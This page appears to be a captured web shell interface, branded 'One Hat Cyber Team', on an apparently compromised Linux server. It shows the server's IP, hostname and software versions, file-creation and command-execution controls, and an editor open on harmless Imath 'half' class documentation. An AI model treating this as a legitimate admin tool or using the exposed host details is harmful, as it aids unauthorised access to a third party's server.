One Hat Cyber Team
Your IP :
216.73.216.180
Server IP :
162.240.179.46
Server :
Linux vps-14493116.nutrivittasaude.com.br 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.2.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
imath-devel
/
html
/
_sources
/
classes
/
Edit File:
half.rst.txt
The half Class ############## .. code-block:: #include <Imath/half.h> ``half`` is a 16-bit floating point number. See `The half Type`_ for an explanation of the representation. Also, see `C-language half Conversion`_ for C-language support for conversion between ``half`` and ``float``. Example: .. literalinclude:: ../examples/half.cpp :language: c++ .. doxygenclass:: Imath::half :undoc-members: :members: .. doxygenfunction:: operator<<(std::ostream& os, Imath::half h) .. doxygenfunction:: operator>>(std::ostream& is, Imath::half& h)
Simpan